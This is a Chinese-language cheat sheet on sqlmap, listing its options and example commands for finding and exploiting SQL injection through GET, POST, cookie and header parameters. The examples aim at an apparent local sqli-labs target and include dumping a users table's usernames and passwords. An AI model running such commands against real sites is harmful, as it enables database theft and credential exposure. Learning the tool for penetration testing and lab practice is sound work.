SQLmap常用命令/使用教程

简介: Lmap是一款自动化SQL注入神器,用于SQL注入漏洞的检测和利用,支持多种数据库

SQLmap是一款自动化SQL注入神器,用于SQL注入漏洞的检测和利用,支持多种数据库

检测位置

-u      -- 指定url(GET请求)
-p      -- 指定参数(url包含多个参数时,指定参数)
--data=   -- 指定POST请求参数
--cookie  -- 指定cookie参数
-r      -- 从文件中加载HTTP请求(在需要检测的Header后面加上*)

获取数据

1. --dbs    -- 获取数据库名
2. --tables -- 获取表名
3. --columns  -- 获取字段名
4. --dump   -- 获取数据
5. -D -- 指定数据库
6. -T -- 指定表
7. -C -- 指定字段

其他设置

--batch   -- 自动化确认
--tamper  -- 指定脚本
--dbms    -- 指定数据库类型
--os    -- 指定操作系统(windows/linux)
--level   -- 指定探测等级(1~5)
--current-db  -- 获取当前数据库的名字
-b  -- 获取数据库版本信息
-f  -- 获取数据库指纹
--users -- 当前使用的用户
--delay -- 设置延时
--technique -- 指定注入方式
  U 联合注入
  E 报错注入
  B 布尔盲注
  T 时间盲注

针对不同的注入位置

GET请求注入

sqlmap -u http://192.168.40.129/sqli/Less-1/?id=1

POST请求注入

sqlmap -u http://192.168.40.129/sqli/Less-11/ --data="uname=lisi"

COOKIE注入

sqlmap -u xxx/index.php --cookie "uname=admin" --level 2 --dbs

HTTP请求头注入(User-agent/Referer/Cookie等HTTP Header),拦截get,post等HTTP请求,将所有请求内容复制到target.vm文件中,在需要检测的Header后面加上*,并且需要level>=3

sqlmap -r target.vm --level 3 --dbs

获取数据

获取所有数据库

sqlmap -u http://192.168.40.129/sqli/Less-1/?id=1 --batch --dbs

获取指定数据库中的所有表

sqlmap -u http://192.168.40.129/sqli/Less-1/?id=1 --batch -D security --tables

获取指定数据库中指定表的所有字段

sqlmap -u http:xxx/?id=1 --batch -D security -T users --columns

获取指定数据库中指定表中指定字段的所有数据

sqlmap -u xxx/?id=1 --batch -D security -T users -C username,password --dump

HTTP Header头注入

1.拦截post请求信息,并将请求信息的全部内容复制到文件中,

2.在需要检测的Header位置添加*

3.使用SQLmap对指定文件进行检测,SQLmap会自动检索*,从而对目标Header进行检测

image.png

相关文章
|
Python Windows
sqlmap安装及简介
sqlmap安装及简介
416 0
|
7月前
|
SQL 数据库 Python
sqlmap的安装及使用教程_sqlmap安装使用教程
sqlmap的安装及使用教程_sqlmap安装使用教程
|
7月前
|
安全 生物认证 数据库
2021Kali系列 -- Sqlmap基础操作
2021Kali系列 -- Sqlmap基础操作
78 0
|
安全 Shell 测试技术
Metasploit -- 目录详解及常用命令
Metasploit -- 目录详解及常用命令
257 0
Metasploit -- 目录详解及常用命令
|
SQL 安全 数据库
sqlmap的基本使用方法
sqlmap的基本使用方法
380 0
|
运维 Shell Linux
《Shell 脚本速查手册》下载地址
编写Bash脚本耗时长?不稳定?有妙招!阿里云开发者社区和linux中国开源社区联手推出《Shell脚本速查手册》,为运维工程师提供一个快速、便捷的查询手册,以共开发者查询自己日常工作中常用的命令和脚本。
153 0
《Shell 脚本速查手册》下载地址
|
SQL 安全 关系型数据库
5.sqlmap 的基本使用
sqlmap是一款开源免费的漏洞检查、利用工具. 可以检测页面中get,post参数,cookie,http头等. 基本上可以说 安全从业人员必备的一款神器之软件.也是迈入安全圈的必要条件.
5.sqlmap 的基本使用
|
安全 Java Linux
Git安装教程及常用命令
  SVN是集中式版本控制系统,版本库是集中放在中央服务器的,而干活的时候,用的都是自己的电脑,所以首先要从中央服务器哪里得到最新的版本,然后干活,干完后,需要把自己做完的活推送到中央服务器。集中式版本控制系统是必须联网才能工作,如果在局域网还可以,带宽够大,速度够快,如果在互联网下,如果网速慢的话,就纳闷了。
310 0
Git安装教程及常用命令
|
生物认证
nmap常用命令/使用教程
nmap被称为诸神之眼,常用来网络探测,比如探测存活的服务器以及开放的服务端口
306 0
nmap常用命令/使用教程
|
数据库